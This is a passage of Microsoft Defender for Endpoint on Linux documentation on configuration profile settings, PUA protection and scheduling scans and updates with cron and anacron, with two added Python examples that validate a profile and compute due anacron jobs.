Possible values potentially_unwanted_application, archive_bomb

Action to take

Action to take when coming across a threat of the type specified in the preceding
section. Can be:

Audit: The device isn't protected against this type of threat, but an entry about the
threat is logged.
Block: The device is protected against this type of threat and you're notified in the
security console.
Off: The device isn't protected against this type of threat and nothing is logged.

Description Value
Key value
Data type String
Possible values audit (default), block, off

Threat type settings merge policy

Specifies the merge policy for threat type settings. This can be a combination of
administrator-defined and user-defined settings ( merge ) or only administrator-defined
settings ( admin_only ). This setting can be used to restrict local users from defining their
own settings for different threat types.

Description Value
Key threatTypeSettingsMergePolicy
Data type String
Possible values merge (default), admin_only
Comments Available in Defender for Endpoint version 100.83.73 or higher.

Antivirus scan history retention (in days)

Specify the number of days that results are retained in the scan history on the device.
Old scan results are removed from the history; old quarantined files are also removed
from the disk.

Description Value
Key scanResultsRetentionDays
Data type String
Possible values 90 (default). Allowed values are from 1 day to 180 days.
Comments Available in Defender for Endpoint version 101.04.76 or higher.

Maximum number of items in the antivirus scan history

Specify the maximum number of entries to keep in the scan history. Entries include all
on-demand scans performed in the past and all antivirus detections.

Description Value
Key scanHistoryMaximumItems
Data type String
Possible values 10000 (default). Allowed values are from 5000 items to 15000 items.
Comments Available in Defender for Endpoint version 101.04.76 or higher.


Advanced scan options
The following settings can be configured to enable certain advanced scanning features.

7 Note

Enabling these features might impact device performance. As such, it is
recommended to keep the defaults.

Configure scanning of file modify permissions events

When this feature is enabled, Defender for Endpoint will scan files when their
permissions have been changed to set the execute bit(s).

7 Note

This feature is applicable only when the enableFilePermissionEvents feature is
enabled. For more information, see the Advanced optional features section below.

Description Value
Key scanFileModifyPermissions
Data type Boolean
Possible values false (default), true
Comments Available in Defender for Endpoint version 101.23062.0010 or higher.

Configure scanning of file modify ownership events

When this feature is enabled, Defender for Endpoint will scan files for which ownership
has changed.

7 Note

This feature is applicable only when the enableFileOwnershipEvents feature is
enabled. For more information, see the Advanced optional features section below.

Description Value
Key scanFileModifyOwnership
Data type Boolean
Possible values false (default), true
Comments Available in Defender for Endpoint version 101.23062.0010 or higher.

Configure scanning of raw socket events

When this feature is enabled, Defender for Endpoint will scan network socket events
such as creation of raw sockets / packet sockets, or setting socket option.

7 Note

This feature is applicable only when Behavior Monitoring is enabled.

7 Note

This feature is applicable only when the enableRawSocketEvent feature is enabled.
For more information, see the Advanced optional features section below.

Description Value
Key scanNetworkSocketEvent
Data type Boolean
Possible values false (default), true
Comments Available in Defender for Endpoint version 101.23062.0010 or higher.

Cloud-delivered protection preferences

The cloudService entry in the configuration profile is used to configure the cloud-driven
protection feature of the product.

7 Note

Cloud-delivered protection is applicable with any Enforcement level settings
(real_time, on_demand, passive).

Description Value
Key cloudService
Data type Dictionary (nested preference)
Comments See the following sections for a description of the dictionary contents.

Enable / disable cloud delivered protection

Determines whether cloud-delivered protection is enabled on the device or not. To
improve the security of your services, we recommend keeping this feature turned on.

Description Value
Key enabled
Data type Boolean
Possible values true (default), false

Diagnostic collection level

Diagnostic data is used to keep Defender for Endpoint secure and up to date, detect,
diagnose and fix problems, and also make product improvements. This setting
determines the level of diagnostics sent by the product to Microsoft.

Description Value
Key diagnosticLevel
Data type String
Possible values optional, required (default)

Configure cloud block level

This setting determines how aggressive Defender for Endpoint is in blocking and
scanning suspicious files. If this setting is on, Defender for Endpoint is more aggressive
when identifying suspicious files to block and scan; otherwise, it is less aggressive and
therefore blocks and scans with less frequency.

There are five values for setting cloud block level:

Normal (normal): The default blocking level.
Moderate (moderate): Delivers a verdict only for high-confidence detections.
High (high): Aggressively blocks unknown files while optimizing for performance (greater chance of blocking non-harmful files).
High Plus (high_plus): Aggressively blocks unknown files and applies additional protection measures (might impact client device performance).
Zero Tolerance (zero_tolerance): Blocks all unknown programs.

Description Value
Key cloudBlockLevel
Data type String
Possible values normal (default), moderate, high, high_plus, zero_tolerance
Comments Available in Defender for Endpoint version 101.56.62 or higher.


Enable / disable automatic sample submissions
Determines whether suspicious samples (that are likely to contain threats) are sent to
Microsoft. There are three levels for controlling sample submission:

None: no suspicious samples are submitted to Microsoft.
Safe: only suspicious samples that don't contain personally identifiable information (PII) are submitted automatically. This is the default value for this setting.
All: all suspicious samples are submitted to Microsoft.

Description Value
Key automaticSampleSubmissionConsent
Data type String
Possible values none, safe (default), all

Enable / disable automatic security intelligence updates


Determines whether security intelligence updates are installed automatically:

ノ Expand table

Description Value

Key automaticDefinitionUpdateEnabled

Data type Boolean

Possible values true (default)


false

Advanced optional features


The following settings can be configured to enable certain advanced features.

7 Note
Enabling these features might impact device performance. It is recommended to
keep the defaults.

ノ Expand table

Description Value

Key features

Data type Dictionary (nested preference)

Comments See the following sections for a description of the dictionary contents.

Module load feature

Determines whether module load events (file open events on shared libraries) are
monitored.

7 Note

This feature is applicable only when Behavior Monitoring is enabled.

Key: moduleLoad
Data type: String
Possible values: disabled (default), enabled
Comments: Available in Defender for Endpoint version 101.68.80 or higher.

Supplementary sensor configurations

The following settings can be used to configure certain advanced supplementary sensor
features.

Key: supplementarySensorConfigurations
Data type: Dictionary (nested preference)
Comments: See the following sections for a description of the dictionary contents.

Configure monitoring of file modify permissions events

Determines whether file modify permissions events (chmod) are monitored.

7 Note

When this feature is enabled, Defender for Endpoint will monitor changes to the
execute bits of files, but not scan these events. For more information, see the
Advanced scanning features section.

Key: enableFilePermissionEvents
Data type: String
Possible values: disabled (default), enabled
Comments: Available in Defender for Endpoint version 101.23062.0010 or higher.

Configure monitoring of file modify ownership events

Determines whether file modify ownership events (chown) are monitored.

7 Note

When this feature is enabled, Defender for Endpoint will monitor changes to the
ownership of files, but not scan these events. For more information, see the
Advanced scanning features section.

Key: enableFileOwnershipEvents
Data type: String
Possible values: disabled (default), enabled
Comments: Available in Defender for Endpoint version 101.23062.0010 or higher.

Configure monitoring of raw socket events

Determines whether network socket events involving creation of raw sockets / packet
sockets, or setting socket options, are monitored.

7 Note

This feature is applicable only when Behavior Monitoring is enabled.

7 Note

When this feature is enabled, Defender for Endpoint will monitor these network
socket events, but not scan these events. For more information, see the
Advanced scanning features section above.

Key: enableRawSocketEvent
Data type: String
Possible values: disabled (default), enabled
Comments: Available in Defender for Endpoint version 101.23062.0010 or higher.

Configure monitoring of boot loader events

Determines whether boot loader events are monitored and scanned.

7 Note

This feature is applicable only when Behavior Monitoring is enabled.

Key: enableBootLoaderCalls
Data type: String
Possible values: disabled (default), enabled
Comments: Available in Defender for Endpoint version 101.68.80 or higher.

Configure monitoring of ptrace events

Determines whether ptrace events are monitored and scanned.

7 Note

This feature is applicable only when Behavior Monitoring is enabled.

Key: enableProcessCalls
Data type: String
Possible values: disabled (default), enabled
Comments: Available in Defender for Endpoint version 101.68.80 or higher.

Configure monitoring of pseudofs events

Determines whether pseudofs events are monitored and scanned.

7 Note

This feature is applicable only when Behavior Monitoring is enabled.

Key: enablePseudofsCalls
Data type: String
Possible values: disabled (default), enabled
Comments: Available in Defender for Endpoint version 101.68.80 or higher.

Configure monitoring of module load events using eBPF

Determines whether module load events are monitored using eBPF and scanned.

7 Note

This feature is applicable only when Behavior Monitoring is enabled.

Key: enableEbpfModuleLoadEvents
Data type: String
Possible values: disabled (default), enabled
Comments: Available in Defender for Endpoint version 101.68.80 or higher.

Report AV Suspicious Events to EDR

Determines whether suspicious events from Antivirus are reported to EDR.

Key: sendLowfiEvents
Data type: String
Possible values: disabled (default), enabled
Comments: Available in Defender for Endpoint version 101.23062.0010 or higher.

Network protection configurations

The following settings can be used to configure advanced Network Protection
inspection features to control what traffic gets inspected by Network Protection.

7 Note

For these to be effective, Network Protection has to be turned on. For more
information, see Turn on network protection for Linux.

Key: networkProtection
Data type: Dictionary (nested preference)
Comments: See the following sections for a description of the dictionary contents.

Configure ICMP inspection

Determines whether ICMP events are monitored and scanned.

7 Note

This feature is applicable only when Behavior Monitoring is enabled.

Key: disableIcmpInspection
Data type: Boolean
Possible values: true (default), false
Comments: Available in Defender for Endpoint version 101.23062.0010 or higher.

Recommended configuration profile

To get started, we recommend the following configuration profile for your enterprise to
take advantage of all protection features that Defender for Endpoint provides.

The following configuration profile will:

Enable real-time protection (RTP)
Specify how the following threat types are handled:
  Potentially unwanted applications (PUA) are blocked
  Archive bombs (file with a high compression rate) are audited to the product logs
Enable automatic security intelligence updates
Enable cloud-delivered protection
Enable automatic sample submission at safe level

Sample profile

JSON

{
  "antivirusEngine": {
    "enforcementLevel": "real_time",
    "threatTypeSettings": [
      {
        "key": "potentially_unwanted_application",
        "value": "block"
      },
      {
        "key": "archive_bomb",
        "value": "audit"
      }
    ]
  },
  "cloudService": {
    "automaticDefinitionUpdateEnabled": true,
    "automaticSampleSubmissionConsent": "safe",
    "enabled": true,
    "proxy": "<EXAMPLE DO NOT USE> http://proxy.server:port/"
  }
}

Full configuration profile example

The following configuration profile contains entries for all settings described in this
document and can be used for more advanced scenarios where you want more control
over the product.

7 Note

It is not possible to control all Microsoft Defender for Endpoint communication
with only a proxy setting in this JSON.

Full profile

JSON

{
  "antivirusEngine": {
    "enforcementLevel": "real_time",
    "behaviorMonitoring": "enabled",
    "scanAfterDefinitionUpdate": true,
    "scanArchives": true,
    "scanHistoryMaximumItems": 10000,
    "scanResultsRetentionDays": 90,
    "maximumOnDemandScanThreads": 2,
    "exclusionsMergePolicy": "merge",
    "exclusions": [
      {
        "$type": "excludedPath",
        "isDirectory": false,
        "path": "/var/log/system.log<EXAMPLE DO NOT USE>"
      },
      {
        "$type": "excludedPath",
        "isDirectory": true,
        "path": "/run<EXAMPLE DO NOT USE>"
      },
      {
        "$type": "excludedPath",
        "isDirectory": true,
        "path": "/home/*/git<EXAMPLE DO NOT USE>"
      },
      {
        "$type": "excludedFileExtension",
        "extension": ".pdf<EXAMPLE DO NOT USE>"
      },
      {
        "$type": "excludedFileName",
        "name": "cat<EXAMPLE DO NOT USE>"
      }
    ],
    "allowedThreats": [
      "<EXAMPLE DO NOT USE>EICAR-Test-File (not a virus)"
    ],
    "disallowedThreatActions": [
      "allow",
      "restore"
    ],
    "nonExecMountPolicy": "unmute",
    "unmonitoredFilesystems": ["nfs", "fuse"],
    "threatTypeSettingsMergePolicy": "merge",
    "threatTypeSettings": [
      {
        "key": "potentially_unwanted_application",
        "value": "block"
      },
      {
        "key": "archive_bomb",
        "value": "audit"
      }
    ]
  },
  "cloudService": {
    "enabled": true,
    "diagnosticLevel": "optional",
    "automaticSampleSubmissionConsent": "safe",
    "automaticDefinitionUpdateEnabled": true,
    "proxy": "<EXAMPLE DO NOT USE> http://proxy.server:port/"
  }
}

Add tag or group ID to the configuration profile

When you run the mdatp health command for the first time, the value for the tag and
group ID will be blank. To add a tag or group ID to the mdatp_managed.json file, follow
the steps below:

1. Open the configuration profile from the path
/etc/opt/microsoft/mdatp/managed/mdatp_managed.json .
2. Go down to the bottom of the file, where the cloudService block is located.
3. Add the required tag or group ID as in the following example, after the closing
curly bracket of the cloudService block.

JSON

  },
  "cloudService": {
    "enabled": true,
    "diagnosticLevel": "optional",
    "automaticSampleSubmissionConsent": "safe",
    "automaticDefinitionUpdateEnabled": true,
    "proxy": "http://proxy.server:port/"
  },
  "edr": {
    "groupIds": "GroupIdExample",
    "tags": [
      {
        "key": "GROUP",
        "value": "Tag"
      }
    ]
  }
}

7 Note

Add the comma after the closing curly bracket at the end of the cloudService
block. Also, make sure that there are two closing curly brackets after adding the Tag or
Group ID block (see the example above). At the moment, the only supported
key name for tags is GROUP .
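A profile is only read correctly if its values are the ones the product documents, and mistakes such as packing two filesystem names into one unmonitoredFilesystems string or using a tag key other than GROUP are easy to make by hand. The following validator is an added example (not Microsoft's code and not part of the mdatp tool): it loads a mdatp_managed.json document and checks the string-valued preferences documented above against their possible values, the boolean preferences for a real JSON boolean, the threat type actions against off/audit/block, and the edr tags for the GROUP key. The two embedded profiles are constructed for the example; the enforcementLevel values on_demand and passive belong to the same preference set but are not listed in the excerpt above.

```python
"""Check a mdatp_managed.json profile against the documented keys and values.

Added example (not Microsoft's code): the allowed values below are the ones
listed for each preference on this page; the two profiles are constructed.
"""
import json

ENABLED_DISABLED = {"enabled", "disabled"}
SENSOR_KEYS = ("enableFilePermissionEvents", "enableFileOwnershipEvents", "enableRawSocketEvent",
               "enableBootLoaderCalls", "enableProcessCalls", "enablePseudofsCalls",
               "enableEbpfModuleLoadEvents", "sendLowfiEvents")

# Dotted JSON path -> allowed string values, as documented for each preference.
ALLOWED = {
    "antivirusEngine.enforcementLevel": {"real_time", "on_demand", "passive"},
    "antivirusEngine.behaviorMonitoring": ENABLED_DISABLED,
    "cloudService.diagnosticLevel": {"optional", "required"},
    "cloudService.cloudBlockLevel": {"normal", "moderate", "high", "high_plus", "zero_tolerance"},
    "cloudService.automaticSampleSubmissionConsent": {"none", "safe", "all"},
    "features.moduleLoad": ENABLED_DISABLED,
    "features.ebpfSupplementaryEventProvider": ENABLED_DISABLED,
}
ALLOWED.update({f"supplementarySensorConfigurations.{k}": ENABLED_DISABLED for k in SENSOR_KEYS})
# Paths that must carry a JSON boolean, not the strings "true"/"false".
BOOLEAN_KEYS = {"cloudService.enabled", "cloudService.automaticDefinitionUpdateEnabled",
                "networkProtection.disableIcmpInspection"}
THREAT_ACTIONS = {"off", "audit", "block"}


def _leaves(obj, prefix=""):
    """Yield (dotted_path, value) for every non-dict value in a nested dict."""
    for key, value in obj.items():
        path = prefix + key
        if isinstance(value, dict):
            yield from _leaves(value, path + ".")
        else:
            yield path, value


def validate_profile(text):
    """Return a list of problem descriptions for a profile document; empty means clean."""
    try:
        profile = json.loads(text)
    except json.JSONDecodeError as exc:
        return [f"invalid JSON: {exc}"]
    problems = []
    for path, value in _leaves(profile):
        if path in ALLOWED and (not isinstance(value, str) or value not in ALLOWED[path]):
            problems.append(f"{path}: {value!r} is not one of {sorted(ALLOWED[path])}")
        elif path in BOOLEAN_KEYS and not isinstance(value, bool):
            problems.append(f"{path}: expected true or false, got {value!r}")
    av = profile.get("antivirusEngine", {})
    for name in av.get("unmonitoredFilesystems", []):
        if "," in name:   # "nfs,fuse" is one string, not two filesystems
            problems.append(f"antivirusEngine.unmonitoredFilesystems: {name!r} must be one name per entry")
    for setting in av.get("threatTypeSettings", []):
        if setting.get("value") not in THREAT_ACTIONS:
            problems.append(f"threatTypeSettings[{setting.get('key')}]: {setting.get('value')!r} "
                            f"is not one of {sorted(THREAT_ACTIONS)}")
    for tag in profile.get("edr", {}).get("tags", []):
        if tag.get("key") != "GROUP":
            problems.append(f"edr.tags: key {tag.get('key')!r} is not supported; only GROUP is")
    return problems


# Constructed profile with three mistakes: an undocumented cloudBlockLevel, two
# filesystems packed into one unmonitoredFilesystems string, and a wrong tag key.
BAD_PROFILE = """{
  "antivirusEngine": {"enforcementLevel": "real_time", "unmonitoredFilesystems": ["nfs,fuse"],
                      "threatTypeSettings": [{"key": "potentially_unwanted_application", "value": "block"}]},
  "cloudService": {"enabled": true, "cloudBlockLevel": "aggressive", "automaticDefinitionUpdateEnabled": true},
  "edr": {"groupIds": "GroupIdExample", "tags": [{"key": "Group", "value": "Tag"}]}
}"""

# Constructed profile that uses only documented values.
CLEAN_PROFILE = """{
  "antivirusEngine": {"enforcementLevel": "real_time", "unmonitoredFilesystems": ["nfs", "fuse"],
                      "threatTypeSettings": [{"key": "archive_bomb", "value": "audit"}]},
  "cloudService": {"enabled": true, "diagnosticLevel": "optional", "cloudBlockLevel": "high",
                   "automaticSampleSubmissionConsent": "safe", "automaticDefinitionUpdateEnabled": true},
  "features": {"moduleLoad": "disabled", "ebpfSupplementaryEventProvider": "enabled"},
  "supplementarySensorConfigurations": {"enableRawSocketEvent": "enabled"},
  "networkProtection": {"disableIcmpInspection": true},
  "edr": {"tags": [{"key": "GROUP", "value": "Tag"}]}
}"""

if __name__ == "__main__":
    for label, text in (("bad", BAD_PROFILE), ("clean", CLEAN_PROFILE)):
        print(label, validate_profile(text) or "OK")
```

Running the block prints three findings for the first profile and OK for the second. Unknown keys are deliberately not reported, since the excerpt above does not document every preference the product accepts; the check is only as complete as the table it is built from.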


Detect and block potentially unwanted
applications with Microsoft Defender
for Endpoint on Linux
Article • 11/15/2023

Applies to:

Microsoft Defender for Endpoint Plan 1


Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Want to experience Defender for Endpoint? Sign up for a free trial.

The potentially unwanted application (PUA) protection feature in Defender for Endpoint
on Linux can detect and block PUA files on endpoints in your network.

These applications are not considered viruses, malware, or other types of threats, but
might perform actions on endpoints that adversely affect their performance or use. PUA
can also refer to applications that are considered to have poor reputation.

These applications can increase the risk of your network being infected with malware,
cause malware infections to be harder to identify, and can waste IT resources in cleaning
up the applications.

How it works
Defender for Endpoint on Linux can detect and report PUA files. When configured in
blocking mode, PUA files are moved to the quarantine.

When a PUA is detected on an endpoint, Defender for Endpoint on Linux keeps a record
of the infection in the threat history. The history can be visualized from the Microsoft
Defender portal or through the mdatp command-line tool. The threat name will contain
the word "Application".

Configure PUA protection

PUA protection in Defender for Endpoint on Linux can be configured in one of the
following ways:

Off: PUA protection is disabled.
Audit: PUA files are reported in the product logs, but not in Microsoft Defender
XDR. No record of the infection is stored in the threat history and no action is
taken by the product.
Block: PUA files are reported in the product logs and in Microsoft Defender XDR. A
record of the infection is stored in the threat history and action is taken by the
product.

2 Warning

By default, PUA protection is configured in Audit mode.

You can configure how PUA files are handled from the command line or from the
management console.

Use the command-line tool to configure PUA protection:

In Terminal, execute the following command to configure PUA protection:

Bash

mdatp threat policy set --type potentially_unwanted_application --action [off|audit|block]

Use the management console to configure PUA protection:

In your enterprise, you can configure PUA protection from a management console, such
as Puppet or Ansible, similarly to how other product settings are configured. For more
information, see the Threat type settings section of the Set preferences for Defender for
Endpoint on Linux article.

Related articles
Set preferences for Defender for Endpoint on Linux

 Tip
Do you want to learn more? Engage with the Microsoft Security community in our
Tech Community: Microsoft Defender for Endpoint Tech Community .


Schedule scans with Microsoft Defender
for Endpoint (Linux)
Article • 02/21/2024

Applies to:

Microsoft Defender for Endpoint Plan 1


Microsoft Defender for Endpoint Plan 2

To run a scan for Linux, see Supported Commands.

For Linux (and Unix), you can use a tool called crontab (similar to Task Scheduler in
Windows) to run scheduled tasks.

Prerequisite

7 Note

To get a list of all the time zones, run the following command: timedatectl list-
timezones

Examples for timezones:

America/Los_Angeles

America/New_York

America/Chicago

America/Denver

To set the Cron job


Use the following commands:

Backup crontab entries


Bash

sudo crontab -l > /var/tmp/cron_backup_200919.dat


7 Note

Where 200919 == YYMMDD

 Tip

Do this before you edit or remove.

To edit the crontab, and add a new job as a root user:

Bash

sudo crontab -e

7 Note

The default editor is VIM.

You might see:

Output

0 * * * * /etc/opt/microsoft/mdatp/logrorate.sh

Press "Insert"

Add the following entries:

Bash

CRON_TZ=America/Los_Angeles

0 2 * * sat /bin/mdatp scan quick > ~/mdatp_cron_job.log

7 Note

In this example, we have set it to 00 minutes, 2 a.m. (hour in 24 hour format), any
day of the month, any month, on Saturdays. Meaning it will run Saturdays at 2:00
a.m. Pacific (UTC -8).

Press "Esc"

Type " :wq " without the double quotes.

7 Note

w == write, q == quit

To view your cron jobs, type sudo crontab -l

To inspect cron job runs

Bash

sudo grep mdatp /var/log/cron

To inspect the mdatp_cron_job.log*

Bash

sudo nano mdatp_cron_job.log

If you're using Ansible, Chef, Puppet, or SaltStack

Use the following commands:

To set cron jobs in Ansible

Ansible module: cron - Manage cron.d and crontab entries

For more information, see Ansible documentation .

To set crontabs in Chef

Chef resource: cron resource

For more information, see Chef documentation .

To set cron jobs in Puppet

Resource Type: cron

See https://puppet.com/docs/puppet/5.5/types/cron.html for more information.

Automating with Puppet: Cron jobs and scheduled tasks

For more information, see Puppet documentation about jobs and scheduled tasks .

To manage cron jobs in SaltStack

Resource Type: salt.states.cron

Example:

yml

mdatp scan quick > /tmp/mdatp_scan_log.log:
  cron.present:
    - special: '@hourly'

For more information, see the Salt.States.Cron documentation .

Additional information

To get help with crontab


Bash
man crontab

To get a list of crontab file of the current user


Bash

crontab -l

To get a list of crontab file of another user


Bash

crontab -u username -l

To back up crontab entries


Bash

crontab -l > /var/tmp/cron_backup.dat

 Tip

Do this before you edit or remove.

To restore crontab entries


Bash

crontab /var/tmp/cron_backup.dat

To edit the crontab and add a new job as a root user


Bash

sudo crontab -e
To edit the crontab and add a new job
Bash

crontab -e

To edit other user's crontab entries


Bash

crontab -u username -e

To remove all crontab entries


Bash

crontab -r

To remove other user's crontab entries


Bash

crontab -u username -r

Explanation

+------------- minute (values: 0 - 59) (special characters: , - * /)
| +----------- hour (values: 0 - 23) (special characters: , - * /)
| | +--------- day of month (values: 1 - 31) (special characters: , - * / L W C)
| | | +------- month (values: 1 - 12) (special characters: , - * /)
| | | | +----- day of week (values: 0 - 6) (Sunday=0 or 7) (special characters: , - * / L W C)
| | | | |
* * * * * command to be executed

Schedule an antivirus scan using
Anacron in Microsoft Defender for
Endpoint on Linux
Article • 07/18/2023

Applies to:

Microsoft Defender for Endpoint Plan 1


Microsoft Defender for Endpoint Plan 2

To run a scan of Microsoft Defender Antivirus for Linux, see Supported Commands.

7 Note

This article supports Microsoft Defender for Endpoint on Linux for Red Hat
Enterprise Linux distributions (RHEL).

System requirements
See the following system requirements needed to schedule Microsoft Defender
Antivirus scan in Microsoft Defender Endpoint on Linux.

Linux server distributions and versions: Red Hat Enterprise Linux 7.2 or higher.
The FANOTIFY option in kernel must be enabled.

Scheduling Microsoft Defender Antivirus scan in Red Hat Linux

You can schedule cron jobs to initiate Microsoft Defender Antivirus scans on a schedule.
For more information, see How to schedule scans with Microsoft Defender for Endpoint
on Linux. This process works well if the device is always up and running.

But if the Linux devices are shut down or offline during the cron schedule, the scan
won't run. In these situations, you can use anacron to read the timestamp and find the
last executed job. If the device was shut down during the scheduled cron job, it needs to
wait until the next scheduled time. By using anacron, the system will detect the last time
the scan was run. If the device didn't run the cron job, it will automatically start it.

Schedule Microsoft Defender Antivirus scans in Red Hat Linux

Use the following steps to schedule scans:

1. Connect to the RedHat server using PuTTY.

2. Edit the anacron file:

shell

vi /etc/anacrontab

3. The file contains settings like the following:

shell

# /etc/anacrontab: configuration file for anacron
# See anacron (8) and anacrontab (5) for details.
SHELL=/bin/sh
PATH=/sbin:/bin:/usr/sbin:/usr/bin
RANDOM_DELAY=45
# Anacron jobs will start between 8pm and 11pm.
START_HOURS_RANGE=20-23
# delay will be 5 minutes + RANDOM_DELAY for cron.daily

1. Note the following items in the file.

a. Shell: Shell is referred to as /bin/sh, and not as /bin/bash. Remember this when
writing the jobs.
b. RANDOM_DELAY: Describes the maximum time in minutes by which a job is delayed. This
value is used to offset the jobs so there wouldn't be too many jobs running at
the same time. Using this delay is ideal for VDI solutions.
c. START_HOURS_RANGE: Describes the time range to run the job.
d. cron.daily: Describes 1 as the period of days required for the frequency of job
executions. 5 is the delay in minutes that anacron waits after the device restarts.

2. Review the anacron jobs:

shell

ls -lh /etc/cron*

shell

[root@redhat7 /]# ls -lh /etc/cron*
-rw-------. 1 root root   0 Nov 30  2021 /etc/cron.deny
-rw-r--r--. 1 root root 451 Dec 27  2013 /etc/crontab

/etc/cron.d:
total 28k
-rw-r--r--. 1 root root 128 Nov 30  2021 0hourly
-rw-r--r--. 1 root root 121 Feb 25 18:11 omilogotate
-rw-r--r--. 1 root root 118 Feb 25 18:14 omsagent
-rw-r--r--. 1 root root  79 Feb 25 18:15 OMSConsistencyInvoker
-rw-r--r--. 1 root root 108 Nov  9  2021 raid-check
-rw-r--r--. 1 root root 135 Jun  1 22:35 scxagent
-rw-------. 1 root root 235 Jan 20  2020 sysstat

/etc/cron.daily:
total 24k
-rwxr-xr-x. 1 root root 127 Jun 14 16:49 avscandaily
-rwx------. 1 root root 219 Aug  7  2019 logrotate
-rwxr-xr-x. 1 root root 618 Jul 10  2018 man-db.cron
-rwx------. 1 root root 208 Nov  9  2017 mlocate
-rwx------. 1 root root 558 Apr 18 19:03 rhsmd
-rwxr-xr-x. 1 root root 114 Apr  8  2021 rhui-update-client

/etc/cron.hourly:
total 8.0k
-rwxr-xr-x. 1 root root 392 Nov 30  2021 0anacron
-rwxr-xr-x. 1 root root 131 Jun 14 17:05 update

/etc/cron.monthly:
total 0
-rwxr-xr-x. 1 root root   0 Jun 14 17:47 mdatpupdate

/etc/cron.weekly:
total 0

3. Ignore the /etc/cron.d directory; you will see /etc/cron.daily, hourly, monthly,
and weekly.

4. To schedule a weekly antivirus scan, you can create a file (Job) under the
/etc/cron.weekly directory.

shell

cd /etc/cron.weekly

vi mdavfullscan

Press Insert

shell

#!/bin/sh
# Weekly full scan job run by anacron; the log directory must exist beforehand.
set -e
echo "$(date) Time Scan Begins" >> /logs/mdav_avacron_full_scan.log
/bin/mdatp scan full >> /logs/mdav_avacron_full_scan.log
echo "$(date) Time Scan Finished" >> /logs/mdav_avacron_full_scan.log
exit 0

Press Esc

Type: wq!

5. Change the file permissions to allow the file to be executed.

shell

chmod 755 mdavfullscan

ls -la

shell

[root@redhat7 cron.weekly]# ls -la
total 16
drwxr-xr-x.  2 root root   26 Jun 14 19:19 .
drwxr-xr-x. 85 root root 8192 Jun 14 19:01 ..
-rw-r--r--.  1 root root  128 Jun 14 19:19 mdavfullscan
[root@redhat7 cron.weekly]# chmod 755 mdavfullscan
[root@redhat7 cron.weekly]# ls -lh
total 4.0K
-rwxr-xr-x. 1 root root 128 Jun 14 19:19 mdavfullscan
[root@redhat7 cron.weekly]#

6. Use the command to test the weekly anacron job.

shell

./mdavfullscan

7. Use the command to verify the job ran successfully.

shell

cat /logs/mdav_avacron_full_scan.log

shell
[root@redhat7 cron.weekly] # cat /logs/mdav_avacron_full_scan.log
Tue Jun 14 20:20:44 UTC 2022 Time Scan Begins
Scan has finished
66547 file(s) scanned
0 threat(s) detected
Tue Jun 14 20:20:50 UTC 2022 Time Scan Finished
[root@redhat7 cron.weekly] #
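The procedure above relies on anacron's rule that a job runs when its period has elapsed since the last recorded run, rather than at a fixed wall-clock time, which is why a device that was off over the weekend still gets its weekly scan. The following is an added example (not Microsoft's code and not anacron itself) that reproduces that decision: it parses an anacrontab in the format shown in step 3, compares each job's period with its last-run date (anacron records these per job under /var/spool/anacron), and reports the worst-case start delay from RANDOM_DELAY. The anacrontab text and the last-run dates are constructed for the example; the cron.weekly and @monthly lines are assumptions about a typical file and are not from the page.

```python
"""Work out which anacron jobs are due, as the page describes anacron doing.

Added example (not Microsoft's code): parses an anacrontab in the format shown
in the procedure and compares each job's period with the date of its last run.
The anacrontab text and the last-run dates below are constructed.
"""
from datetime import date

ANACRONTAB = """\
# /etc/anacrontab: configuration file for anacron
SHELL=/bin/sh
PATH=/sbin:/bin:/usr/sbin:/usr/bin
RANDOM_DELAY=45
START_HOURS_RANGE=20-23
# period in days   delay in minutes   job-identifier   command
1\t5\tcron.daily\tnice run-parts /etc/cron.daily
7\t25\tcron.weekly\tnice run-parts /etc/cron.weekly
@monthly 45\tcron.monthly\tnice run-parts /etc/cron.monthly
"""

# Constructed timestamps: the device was off over the weekend, so on Tuesday
# 21 June cron.weekly (last run Tuesday 14 June) is a full period behind.
LAST_RUNS = {"cron.daily": "2022-06-20", "cron.weekly": "2022-06-14", "cron.monthly": "2022-06-01"}


def parse_anacrontab(text):
    """Return (settings, jobs); each job is a dict with period, delay, id and command."""
    settings, jobs = {}, []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if not (line[0].isdigit() or line.startswith("@")):   # NAME=value line
            key, _, value = line.partition("=")
            settings[key.strip()] = value.strip()
            continue
        period, delay, job_id, command = line.split(None, 3)
        jobs.append({"period": period, "delay": int(delay), "id": job_id, "command": command})
    return settings, jobs


def is_due(job, last_run, today):
    """True when the job's period has elapsed since its last run (None means it never ran)."""
    if last_run is None:
        return True
    if job["period"] == "@monthly":
        return (today.year, today.month) != (last_run.year, last_run.month)
    return (today - last_run).days >= int(job["period"])


def due_jobs(text, last_runs, today_iso):
    """Ids of the jobs anacron would start on the given day, given ISO-date last-run records."""
    _, jobs = parse_anacrontab(text)
    today = date.fromisoformat(today_iso)
    due = []
    for job in jobs:
        last = date.fromisoformat(last_runs[job["id"]]) if job["id"] in last_runs else None
        if is_due(job, last, today):
            due.append(job["id"])
    return due


def max_start_delay(text, job_id):
    """Latest start in minutes after anacron begins: job delay + RANDOM_DELAY (5 + 45 for cron.daily)."""
    settings, jobs = parse_anacrontab(text)
    job = next(j for j in jobs if j["id"] == job_id)
    return job["delay"] + int(settings.get("RANDOM_DELAY", "0"))


if __name__ == "__main__":
    print("due on 2022-06-21:", due_jobs(ANACRONTAB, LAST_RUNS, "2022-06-21"))
    print("cron.daily starts at most", max_start_delay(ANACRONTAB, "cron.daily"), "minutes in")
```

With the constructed records, 21 June yields cron.daily and cron.weekly but not cron.monthly; a device that first boots on 1 July would get all three, because the monthly job's last run falls in a different month. Note that START_HOURS_RANGE only bounds when anacron begins a run; a job past its period is started on the next boot within that window, not at the time the cron entry would have fired.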

Schedule an update of the Microsoft
Defender for Endpoint (Linux)
Article • 01/26/2024

Applies to:

Microsoft Defender for Endpoint Plan 1


Microsoft Defender for Endpoint Plan 2

To run an update on Microsoft Defender for Endpoint on Linux, see Deploy updates for
Microsoft Defender for Endpoint on Linux.

Linux (and Unix) have a tool called crontab (similar to Task Scheduler) for running
scheduled tasks.

Pre-requisite

7 Note

To get a list of all the time zones, run the following command: timedatectl list-
timezones

Examples for timezones:

America/Los_Angeles

America/New_York

America/Chicago

America/Denver

To set the Cron job


Use the following commands:

Backup crontab entries


Bash

sudo crontab -l > /var/tmp/cron_backup_201118.dat


7 Note

Where 201118 == YYMMDD

 Tip

Do this before you edit or remove.

To edit the crontab, and add a new job as a root user:

Bash

sudo crontab -e

7 Note

The default editor is VIM.

You might see:

Output

